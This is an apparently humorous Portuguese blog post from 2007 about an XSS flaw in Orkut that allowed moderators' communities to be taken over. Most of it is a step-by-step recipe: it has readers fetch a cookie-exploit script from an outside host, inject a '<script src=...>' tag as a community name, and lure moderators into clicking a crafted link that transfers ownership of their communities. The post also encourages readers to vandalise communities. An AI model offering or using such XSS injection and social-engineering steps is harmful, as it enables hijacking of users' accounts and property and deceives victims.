Categoria: Blog

Falha pra roubo de comunidade no Orkut: a verdadeira História Sem Fim

UPDATE: ESTA FALHA JÁ FOI CORRIGIDA PELO ORKUT. MAS FICA LIGADO QUE NÃO DEMORA MUITO PARA ROLAR OUTRA.

Ano novo, falhas novas no orkut.
Pouco mais de 1 mês depois de milhares de moderadores caírem como patos em links maliciosos (talvez pela 7a vez em 1 ano), cá estamos com mais um capítulo da novela que nunca termina: a das falhas de programação no Orkut.

Tudo exatamente igual: alguém que deixou de assistir um dvd com a namorada ou de beber uma cervejinha com os amigos pra passar a madrugada procurando uma falha no maior site de relacionamentos do mundo. E quem procura acha. Pelo menos no Orkut.

E pra variar de novo, é mais uma do tipo XSS (cross site scripting), dessas que permitem a transferência das comunidades sem necessidade de senha, tornando o orkut
um grande mau exemplo de como não deve ser a programação de um site envolvendo milhões de pessoas.

Ah, e parece que a moda agora é renomear comunidades gigantescas e deixar milhares de membros emputecidos da vida.
Comunidade do Corinthians virando comunidade São Paulina, ou comunidade como a "Faço do meu scrapbook um chat" ser renomeada para "Faço do meu boquete um show!" são apenas alguns exemplos.

E como é de costume do Cocadaboa, segue a receitinha de bolo pra você também barbarizar comunidades e aterrorizar moderadores por ai:


1 - Baixe este arquivo em javascript: http://orkutexploits.90megs.com/orkut_cookie_exploit.js.

2 - Altere apenas a segunda linha do arquivo, onde você vai colocar o UID do profile que irá receber as comunidades roubadas.

3 - Hospede este .js no seu hosting favorito e crie um redirecionamento pra ele no site www.lnk.to

4 - Crie uma comunidade no orkut, colocando no nome dela o seguinte: <script src=link>, onde "link" deve ser o redirecionamento que você criou no passo anterior.
Exemplo: <script src=http://lnk.to/teste>

5 - Após criar a comunidade, clique em "adicionar uma comunidade relacionada" e copie o url da página que irá abrir a seguir.
Exemplo:
http://www.orkut.com/CommunitySearch.aspx?cmm=6969

6 - Agora depende da sua lábia. Cole o link acima no scrapbook dos moderadores pelo orkut, usando um bom argumento pra que eles cliquem nele, transferindo assim o controle de todas as suas comunidades pro profile que você configurou no Passo 2.

E não custa lembrar: após rouba-las, não esqueça de devolver as comunidades! =)

- Vinícius K-Max

Se o Orkut continuar assim, o K-Max vai acabar ganhando coluna fixa no Cocadaboa.

as 16/01/07, 15:49

Envie para um amigo:

Mercado Livre

Categorias: Artigo (3) · Avisos (21) · Calúnia e Difamação (1) · Cocadaboa News (9) · Cotidiano (24) · Crítica (12) · Jabá (8) · O que vi (125) · Respostas (11) · Top 10 (2) ·
Textos antigos: Adaílton Persegonha (34) · Autores Convidados (31) · Blog (1785) · Calúnia e Difamação (43) · Cocada Responde (45) · Cocadaboa News (151) · Eddie Torres (45) · MDF News (12) · MEM (55) · Mensagens do Editor (25) · MrManson (101) · Odisseu Kapyn (57) · Ombudsman Girl (31) · P.I.R.U. (39) · S.A.C.aneie (35) · Sherlock Holmes da Silva (36)

· ·

· · · · eslovenia
BlogBlogs.Com.Br

Atenção: Nosso conteúdo é 100% humorístico e/ou mentiroso. Quer nos processar? Boa sorte, estamos hospedados na Eslovênia.